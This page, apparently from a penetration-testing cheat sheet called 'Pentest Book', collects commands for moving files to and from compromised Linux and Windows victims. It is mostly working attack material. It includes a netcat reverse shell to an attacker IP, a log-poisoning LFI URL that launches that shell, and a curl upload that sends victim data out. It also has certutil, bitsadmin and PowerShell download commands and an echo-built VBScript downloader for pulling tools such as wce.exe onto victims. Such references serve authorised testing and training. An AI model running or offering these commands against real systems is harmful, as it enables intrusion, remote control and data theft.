Pentest Book
Search…
Recon
Exploitation
File transfer
Linux
1
# Web Server
2
# https://github.com/sc0tfree/updog
3
pip3 install updog
4
updog
5
updog -d /another/directory
6
updog -p 1234
7
updog --password examplePassword123!
8
updog --ssl
9
​
10
# Python web server
11
python -m SimpleHTTPServer 8080
12
​
13
# FTP Server
14
twistd -n ftp -p 21 --root /path/
15
# In victim:
16
curl -T out.txt ftp://10.10.15.229
17
​
18
# TFTP Server
19
# In Kali
20
atftpd --daemon --port 69 /tftp
21
# In reverse Windows
22
tftp -i 10.11.1.111 GET nc.exe
23
nc.exe -e cmd.exe 10.11.1.111 4444
24
# Example:
25
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444
Copied!
Windows
1
# Bitsadmin
2
bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
3
​
4
# certutil
5
certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat
6
​
7
# Powershell
8
(New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")
9
invoke-webrequest -Uri http://10.10.14.19:9090/PowerUp.ps1 -OutFile powerup.ps1
10
​
11
# FTP
12
# In reverse shell"
13
echo open 10.11.1.111 > ftp.txt)
14
echo USER anonymous >> ftp.txt
15
echo ftp >> ftp.txt
16
echo bin >> ftp.txt
17
echo GET file >> ftp.txt
18
echo bye >> ftp.txt
19
# Execute
20
ftp -v -n -s:ftp.txt
21
​
22
# SMB Server
23
# Attack machine
24
python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" -u usuario -p pass
25
python /usr/share/doc/python3-impacket/examples/smbserver.py Lab "/root/htb/169-resolute/smb"
26
​
27
# Or SMB service
28
# http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
29
vim /etc/samba/smb.conf
30
[global]
31
workgroup = WORKGROUP
32
server string = Samba Server %v
33
netbios name = indishell-lab
34
security = user
35
map to guest = bad user
36
name resolve order = bcast host
37
dns proxy = no
38
bind interfaces only = yes
39
​
40
[ica]
41
path = /var/www/html/pub
42
writable = no
43
guest ok = yes
44
guest only = yes
45
read only = yes
46
directory mode = 0555
47
force user = nobody
48
​
49
chmod -R 777 smb_path
50
chown -R nobody:nobody smb_path
51
service smbd restart
52
​
53
# Victim machine with reverse shell
54
# Download: copy \\10.11.1.111\Lab\wce.exe .
55
# Upload: copy wtf.jpg \\10.11.1.111\Lab
56
​
57
# VBScript
58
# In reverse shell
59
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
60
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
61
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
62
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
63
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
64
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
65
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
66
echo Err.Clear >> wget.vbs
67
echo Set http = Nothing >> wget.vbs
68
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
69
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
70
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
71
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
72
echo http.Open "GET",strURL,False >> wget.vbs
73
echo http.Send >> wget.vbs
74
echo varByteArray = http.ResponseBody >> wget.vbs
75
echo Set http = Nothing >> wget.vbs
76
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
77
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
78
echo strData = "" >> wget.vbs
79
echo strBuffer = "" >> wget.vbs
80
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
81
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
82
echo Next >> wget.vbs
83
echo ts.Close >> wget.vbs
84
# Execute
85
cscript wget.vbs http://10.11.1.111/file.exe file.exe
Copied!
Last modified 1yr ago